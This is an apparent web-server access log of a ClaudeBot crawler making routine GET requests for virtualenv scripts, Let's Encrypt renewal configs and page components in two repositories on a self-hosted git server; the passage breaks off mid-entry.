[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11018] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11555] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12169] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11015] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=source" [Client 216.73.216.188] [Length 11072] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11572] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19897] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11555] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 216.73.216.188] [Length 11008] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 216.73.216.188] [Length 11718] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 216.73.216.188] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 216.73.216.188] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 216.73.216.188] [Length 11694] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11020] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 216.73.216.188] [Length 11721] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 216.73.216.188] [Length 11004] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 216.73.216.188] [Length 11006] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 216.73.216.188] [Length 11009] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 216.73.216.188] [Length 11006] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13531] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11557] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11574] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 10997] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11019] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 